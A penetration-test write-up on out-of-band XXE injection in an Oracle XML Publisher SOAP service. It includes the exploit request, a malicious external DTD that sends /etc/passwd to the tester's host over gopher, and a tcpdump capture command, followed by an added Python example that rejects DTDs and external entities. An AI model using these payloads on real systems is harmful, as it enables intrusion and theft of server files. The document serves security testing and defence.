Out of Band XXE Injection Via gopher
Hello All
While I was doing a penetration test, I found a page that uses an Oracle product.
After some searching I found this exploit, which seemed to apply:
https://www.exploit-db.com/exploits/40590
So let's try this exploit:
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXML>
</soapenv:Body>
</soapenv:Envelope>
Identification Phase
First, to confirm the injection, let's point the external entity at a Burp Collaborator host:
xxe.ik6popcppq2yb37iatqr5tcxzo5et3.burpcollaborator.net
Now we can be sure there is an out-of-band XXE injection, as the server makes DNS and HTTP requests to the Collaborator host.
Exploitation
Let's try to exfiltrate data using out-of-band XXE; we could use this payload:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://myhost/evil.dtd">
%dtd;
]>
evil.dtd is hosted on my server, and this is its content:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://myhost:80/%file;'>"> %all;
With this we could exfiltrate the first line of /etc/passwd.
Full Exploitation
Now our goal is to get the whole /etc/passwd file. I searched for this issue, and one of the methods is to use an FTP server and connect with ftp://myhost:port, but this method failed as the server rejected this URI scheme.
At last I managed to do this using the gopher URI scheme, so evil.dtd becomes:
<!ENTITY % all "<!ENTITY send SYSTEM 'gopher://myhost:80/%file;'>"> %all;
and I ran tcpdump on port 80 with this command:
tcpdump -A src host vulnerablehost and port 80 and greater 1000
As seen, we could extract any readable file using the gopher URI scheme with out-of-band XXE injection.
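The parser-side fix is to refuse DTDs and external entities before any URI is fetched, rather than blocklisting schemes one at a time (the server above rejected ftp but still honoured gopher). As an added example that is not part of the original post or of the Oracle product, here is how a Python service receiving the same incomingXML string could do that with the standard library's expat bindings; the function names and sample documents are constructed for this illustration.

```python
import xml.parsers.expat as expat


class XXERejected(Exception):
    """Untrusted input declared a DOCTYPE, an entity, or an external reference."""


def parse_untrusted(data: bytes) -> list:
    """Return element names of an untrusted XML document, or raise XXERejected
    before expat fetches anything. Three independent stops:
      * SetParamEntityParsing(NEVER): the %dtd; / %file; chain above is built on
        parameter entities, which expat then never expands;
      * StartDoctypeDeclHandler / EntityDeclHandler: a SOAP string parameter has
        no legitimate DOCTYPE, so abort on the first one;
      * ExternalEntityRefHandler returning 0: refuses any SYSTEM/PUBLIC fetch
        whatever the scheme (http, ftp, gopher), so no scheme blocklist needed.
    """
    seen = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XXERejected(f"DOCTYPE {name!r} not allowed in untrusted input")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise XXERejected(f"entity declaration {name!r} not allowed")

    def on_external_ref(context, base, sysid, pubid):
        return 0  # 0 makes expat fail the parse instead of resolving sysid

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(data, True)  # exceptions raised in handlers propagate here
    return seen


def is_rejected(data: bytes) -> bool:
    """True if parse_untrusted refuses the document (no network I/O happens)."""
    try:
        parse_untrusted(data)
    except XXERejected:
        return True
    return False


# Constructed samples: the post's OOB payload (root element added) and a benign doc.
OOB_XXE = (b'<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [\n'
           b'<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
           b'<!ENTITY % dtd SYSTEM "http://myhost/evil.dtd">\n%dtd;\n]><m/>')
BENIGN = b'<?xml version="1.0"?><order><item sku="A1"/></order>'
```

Calling is_rejected(OOB_XXE) returns True without evil.dtd or /etc/passwd ever being opened, while parse_untrusted(BENIGN) returns ['order', 'item'].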